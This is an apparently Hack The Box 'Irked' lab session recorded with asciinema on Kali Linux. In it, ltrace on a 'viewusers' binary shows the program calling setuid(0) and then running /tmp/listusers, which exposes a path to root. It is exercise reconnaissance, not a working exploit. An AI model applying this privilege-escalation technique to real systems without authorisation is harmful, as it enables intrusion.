{"version": 2, "width": 172, "height": 83, "timestamp": 1662798885, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.088038, "o", "\u001b[?25l\u001b[?7l"]
[0.100323, "o", "\u001b[0m\u001b[34m\u001b[1m.............."]
[0.100564, "o", "\r\n            ..,;:ccc,.\r\n          ......''';lxO.\r\n.....''''..........,:ld;\r\n           .';;;:::;,,.x,\r\n      ..'''.            0Xxoc:,.  ...\r\n  ....                ,ONkc;,;cokOdc',.\r\n .                   OMo           ':\u001b[38;5;8m\u001b[1mdd\u001b[0m\u001b[34m\u001b[1mo.\r\n                    dMc               :OO;\r\n                    0M.                 .:o."]
[0.100685, "o", "\r\n"]
[0.100779, "o", "                    ;Wd"]
[0.100855, "o", "\r\n                     ;XO,"]
[0.10093, "o", "\r\n                       ,d0Odlc;,.."]
[0.101044, "o", "\r\n                           ..',;:cdOOd::,.\r\n"]
[0.101121, "o", "                                    .:d;.':;."]
[0.10116, "o", "\r\n                                       'd,  .'\r\n                                         ;l   ..\r\n"]
[0.101298, "o", "                                          .o\r\n                                            c\r\n                                            .'\r\n                                             .\u001b[0m\r\n"]
[0.101421, "o", "\u001b[21A\u001b[9999999D"]
[0.104826, "o", "\u001b[51C\u001b[0m\u001b[1m\u001b[0m \r\n"]
[0.108231, "o", "\u001b[51C\u001b[0m\u001b[1m\u001b[0m \r\n"]
[0.111617, "o", "\u001b[51C\u001b[0m\u001b[1m\u001b[0m \r\n"]
[0.117451, "o", "\u001b[51C\u001b[0m\u001b[1m         USER\u001b[0m\u001b[0m:\u001b[0m \u001b[34m\u001b[1mroot\u001b[0m@\u001b[34m\u001b[1mkali\u001b[0m "]
[0.117923, "o", "\r\n"]
[0.1215, "o", "\u001b[51C\u001b[0m\u001b[1m┌───────────────────────────────┐\u001b[0m "]
[0.122077, "o", "\r\n"]
[0.13118, "o", "\u001b[51C\u001b[0m\u001b[1m​ ​ OS\u001b[0m\u001b[0m:\u001b[0m Kali GNU/Linux Rolling x86_64\u001b[0m \r\n"]
[0.136642, "o", "\u001b[51C\u001b[0m\u001b[1m​ ​ Host\u001b[0m\u001b[0m:\u001b[0m VMware Virtual Platform None\u001b[0m \r\n"]
[0.140564, "o", "\u001b[51C\u001b[0m\u001b[1m​ ​ Kernel\u001b[0m\u001b[0m:\u001b[0m 5.15.0-kali3-amd64\u001b[0m \r\n"]
[0.145652, "o", "\u001b[51C\u001b[0m\u001b[1m​ ​ Uptime\u001b[0m\u001b[0m:\u001b[0m 3 days, 14 hours, 10 mins\u001b[0m \r\n"]
[0.214756, "o", "\u001b[51C\u001b[0m\u001b[1m​ ​ Packages\u001b[0m\u001b[0m:\u001b[0m 3725 (dpkg)\u001b[0m \r\n"]
[0.234442, "o", "\u001b[51C\u001b[0m\u001b[1m​ ​ Terminal\u001b[0m\u001b[0m:\u001b[0m asciinema\u001b[0m \r\n"]
[0.300054, "o", "\u001b[51C\u001b[0m\u001b[1m​ ​ DE\u001b[0m\u001b[0m:\u001b[0m Xfce 4.16\u001b[0m \r\n"]
[0.305216, "o", "\u001b[51C\u001b[0m\u001b[1m​ ​ WM\u001b[0m\u001b[0m:\u001b[0m Xfwm4\u001b[0m \r\n"]
[0.310853, "o", "\u001b[51C\u001b[0m\u001b[1m​ ​ Memory\u001b[0m\u001b[0m:\u001b[0m 4319MiB / 6877MiB\u001b[0m \r\n"]
[0.314533, "o", "\u001b[51C\u001b[0m\u001b[1m└───────────────────────────────┘\u001b[0m \r\n"]
[0.314788, "o", "\r\n\r\n"]
[0.314978, "o", "\r\n"]
[0.315166, "o", "\r\n"]
[0.315267, "o", "\r\n\r\n\r\n"]
[0.317508, "o", "\u001b[?25h\u001b[?7h"]
[0.331812, "o", "\u001b[?2004h"]
[0.331999, "o", "\u001b]0;root@kali: ~/tmux/tmux-power\u0007\u001b[1;37m┌──(\u001b[1;34mroot💀kali\u001b[1;37m)-[\u001b[0;1m~/tmux/tmux-power\u001b[1;37m]\r"]
[0.332047, "o", "\r\n"]
[0.332141, "o", "\u001b[1;37m└─\u001b[1;34m#\u001b[0m "]
[0.526918, "o", "t"]
[0.912973, "o", "m"]
[1.121852, "o", "u"]
[1.209063, "o", "x"]
[1.273601, "o", " "]
[1.367789, "o", "a"]
[1.430107, "o", "\r\n\u001b[?2004l\r"]
[1.433105, "o", "\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?1006l\u001b[?1005l\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[?1006l\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?2004l\u001b[1;1H\u001b[1;83r\u001b[>c\u001b[>q\u001b[2;5H\u001b[?2004h"]
[1.434651, "o", "\u001b[?25l\u001b[37m\u001b[1m\u001b[H┌──(\u001b[34mroot💀kali\u001b[37m)-[\u001b[39m~/htb/irked/10.10.10.117/loot\u001b[37m]\u001b(B\u001b[m\u001b[K\u001b[37m\u001b[1m\r\n└─\u001b[34m#\u001b(B\u001b[m \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:bash* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                          \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:34:46 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[2;5H"]
[1.434883, "o", "\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[?1006l\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?2004l\u001b[1;1H\u001b[1;83r\u001b[2;5H\u001b[?2004h"]
[1.435029, "o", "\u001b[?25l\u001b[37m\u001b[1m\u001b[H┌──(\u001b[34mroot💀kali\u001b[37m)-[\u001b[39m~/htb/irked/10.10.10.117/loot\u001b[37m]\u001b(B\u001b[m\u001b[K\u001b[37m\u001b[1m\r\n└─\u001b[34m#\u001b(B\u001b[m \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:bash* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                          \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:34:46 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[2;5H"]
[1.442015, "o", "\u001b[?7727h"]
[2.433654, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:bash* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                          \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:34:47 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[2;5H"]
[2.64921, "o", "ltrace ./viewusers"]
[3.438373, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:bash* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                          \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:34:48 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[2;23H"]
[4.441262, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:bash* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                          \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:34:49 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[2;23H"]
[4.447072, "o", "\r\n\u001b[?2004l"]
[4.453882, "o", "__libc_start_main(0x5656a57d, 1, 0xffdb5c54, 0x5656a600"]
[4.454414, "o", " <unfinished ...>\r\nputs("]
[4.454632, "o", "\"This application is being d"]
[4.454808, "o", "evleo\"..."]
[4.456261, "o", "This application is being devleoped to set and test user permissions\r\n"]
[4.456445, "o", ")                                                               = "]
[4.456618, "o", "69\r\n"]
[4.457103, "o", "puts("]
[4.457222, "o", "\"It is still being actively devel\"..."]
[4.457866, "o", "It is still being actively developed\r\n"]
[4.45809, "o", ")                                                               = 37\r\n"]
[4.458382, "o", "system(\"who\""]
[4.476068, "o", "root     tty7         2022-08-25 02:16 (:0)"]
[4.476288, "o", "\r\n"]
[4.476356, "o", "root     pts/4        2022-09-10 04:35 (tmux(351768).%58)\r\n"]
[4.476691, "o", "root     pts/3        2022-09-10 05:56 (tmux(351768).%66)\r\nroot     pts/7        2022-09-10 15:25 (tmux(351768).%67)\r\n"]
[4.476803, "o", "root     pts/2        2022-09-10 05:22 (tmux(351768).%63)\r\nroot     pts/0        2022-09-10 04:30 (tmux(351768).%54)\r\n"]
[4.479433, "o", " <no return ...>\r\n--- SIGCHLD (Child exited) ---\r\n"]
[4.479576, "o", "<... system resumed> )                                                                                    = 0\r\n"]
[4.479957, "o", "setuid(0"]
[4.480323, "o", ")                                                                                                 = 0\r\n"]
[4.480804, "o", "system(\"/tmp/listusers\""]
[4.483497, "o", "sh: 1: /tmp/listusers: not found\r\n"]
[4.483955, "o", " <no return ...>\r\n--- SIGCHLD (Child exited) ---\r\n<... system resumed> )                                                                                    = 32512\r\n"]
[4.484569, "o", "+++ exited (status 0) +++\r\n"]
[4.484936, "o", "\u001b[37m\u001b[1m┌──(\u001b[34mroot💀kali\u001b[37m)-[\u001b[39m~/htb/irked/10.10.10.117/loot\u001b[37m]\r\n└─\u001b[34m#\u001b(B\u001b[m \u001b[?2004h"]
[5.443883, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:bash* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                          \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:34:50 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[24;5H"]
[6.193568, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:bash* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                          \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:34:51 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[24;5H"]
[6.364499, "o", "\u001b[?25l\u001b[37m\u001b[1m\u001b[H┌──(\u001b[34mroot💀kali\u001b[37m)-[\u001b[39m~/htb/irked/10.10.10.117/loot\u001b[37m]\u001b(B\u001b[m\u001b[39X\u001b[39C                                                                               \u001b[38;5;241m\u001b[48;5;231m[0/689]\u001b[49m\u001b[37m\u001b[1m\u001b[2;1H└─\u001b[34m#\u001b(B\u001b[m ltrace ./viewusers\u001b[K\r\n__libc_start_main(0x5656a57d, 1, 0xffdb5c54, 0x5656a600 <unfinished ...>\u001b[K\r\nputs(\"This application is being devleo\"...This application is being devleoped to set and test user permissions\u001b[K\r\n)                                          \u001b[21X\u001b[21C= 69\u001b[K\r\nputs(\"It is still being actively devel\"...It is still being actively developed\u001b[K\r\n)                                          \u001b[21X\u001b[21C= 37\u001b[K\r\nsystem(\"who\"root     tty7         2022-08-25 02:16 (:0)\u001b[K\r\nroot     pts/4        2022-09-10 04:35 (tmux(351768).%58)\u001b[K\r\nroot     pts/3        2022-09-10 05:56 (tmux(351768).%66)\u001b[K\r\nroot     pts/7        2022-09-10 15:25 (tmux(351768).%67)\u001b[K\r\nroot     pts/2        2022-09-10 05:22 (tmux(351768).%63)\u001b[K\r\nroot     pts/0        2022-09-10 04:30"]
[6.36483, "o", " (tmux(351768).%54)\u001b[K\r\n\u001b[1K\u001b[C<no return ...>\u001b[K\r\n--- SIGCHLD (Child exited) ---\u001b[K\r\n<... system resumed> )                     \u001b[63X\u001b[63C= 0\u001b[K\r\nsetuid(0)                                  \u001b[63X\u001b[63C= 0\u001b[K\r\nsystem(\"/tmp/listusers\"sh: 1: /tmp/listusers: not found\u001b[K\r\n\u001b[1K\u001b[C<no return ...>\u001b[K\r\n--- SIGCHLD (Child exited) ---\u001b[K\r\n<... system resumed> )                     \u001b[63X\u001b[63C= 32512\u001b[K\r\n+++ exited (status 0) +++\u001b[K\u001b[37m\u001b[1m\r\n┌──(\u001b[34mroot💀kali\u001b[37m)-[\u001b[39m~/htb/irked/10.10.10.117/loot\u001b[37m]\u001b(B\u001b[m\u001b[K\u001b[37m\u001b[1m\r\n└─\u001b[34m#\u001b(B\u001b[m \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[24;5H\u001b[?2004l"]
[6.365909, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:[tmux]* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:34:51 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[24;5H"]
[6.947762, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:[tmux]* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:34:52 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[23;48H"]
[7.218475, "o", "\u001b[22;26H"]
[7.609384, "o", "\u001b[21;114H"]
[7.774829, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:[tmux]* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:34:53 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[20;31H"]
[8.14637, "o", "\u001b[19;17H"]
[8.935032, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:[tmux]* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:34:54 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[18;56H"]
[9.772701, "o", "\u001b[1;166H\u001b[38;5;241m\u001b[48;5;231m[0/689]\u001b[1;1H\u001b[49m\u001b[37m\u001b[1m┌──\u001b[5C\u001b[34m💀\r\n\u001b[37m└─\u001b[5;44H\u001b(B\u001b[m                     \u001b[7;44H                     \u001b[14;1H \u001b[16;44H                                                               \u001b[17;44H                                                               \u001b[18;56H\u001b[38;5;241m\u001b[48;5;231m \r\n\u001b[39m\u001b[49m \u001b[21;44H                                                               \u001b[23;1H\u001b[37m\u001b[1m┌──\u001b[5C\u001b[34m💀\r\n\u001b[37m└─\u001b[18;56H\u001b(B\u001b[m"]
[9.775034, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:[tmux]* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:34:55 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[18;56H"]
[11.448758, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:[tmux]* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:34:56 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[18;56H"]
[11.628212, "o", "\u001b[5D\u001b[38;5;241m\u001b[48;5;231mfound \u001b[6D\u001b(B\u001b[m"]
[12.294138, "o", "\u001b[4D\u001b[38;5;241m\u001b[48;5;231mnot found \u001b[10D\u001b(B\u001b[m"]
[12.295488, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:[tmux]* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:34:57 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[18;47H"]
[12.793811, "o", "\u001b[16D\u001b[38;5;241m\u001b[48;5;231m/tmp/listusers: not found \u001b[26D\u001b(B\u001b[m"]
[12.795516, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:[tmux]* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:34:58 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[18;31H"]
[12.844715, "o", "\u001b[3D\u001b[38;5;241m\u001b[48;5;231m1: /tmp/listusers: not found \u001b[28G\u001b(B\u001b[m"]
[12.89528, "o", "\r\u001b[38;5;241m\u001b[48;5;231msystem(\"/tmp/listusers\"sh: 1: /tmp/listusers: not found \r\u001b(B\u001b[m"]
[12.945387, "o", "\u001b[17;109H\u001b[38;5;241m\u001b[48;5;231m0                                                               \u001b[18;1Hsystem(\"/tmp/listusers\"sh: 1: /tmp/listusers: not found \u001b[17;109H\u001b(B\u001b[m"]
[12.996016, "o", "\b\b\u001b[38;5;241m\u001b[48;5;231m= 0                                                               \u001b[17;107H\u001b(B\u001b[m"]
[13.046655, "o", "\r\u001b[38;5;241m\u001b[48;5;231msetuid(0)                                                                                                 = 0                                                               \u001b[17;1H\u001b(B\u001b[m"]
[14.188465, "o", "setuid(0)                                                                                                 = 0                                                               \u001b[18;1H\u001b[38;5;241m\u001b[48;5;231msystem(\"/tmp/listusers\"sh: 1: /tmp/listusers: not found \r\u001b(B\u001b[m"]
[14.19037, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:[tmux]* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:34:59 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[18;1H"]
[14.868986, "o", "\u001b[17;110H\u001b[38;5;241m\u001b[48;5;231m                                                               \u001b[18;1Hsystem(\"/tmp/listusers\"sh: 1: /tmp/listusers: not found \u001b[17;110H\u001b(B\u001b[m"]
[14.871486, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:[tmux]* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:00 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[17;110H"]
[15.401074, "o", "                                                               \u001b[18;1H\u001b[38;5;241m\u001b[48;5;231msystem(\"/tmp/listusers\"sh: 1: /tmp/listusers: not found \r\u001b(B\u001b[m"]
[16.463296, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         0:openvpn \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 1:[tmux]* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m 2:ruby  3:nc-Z                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:01 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[18;1H"]
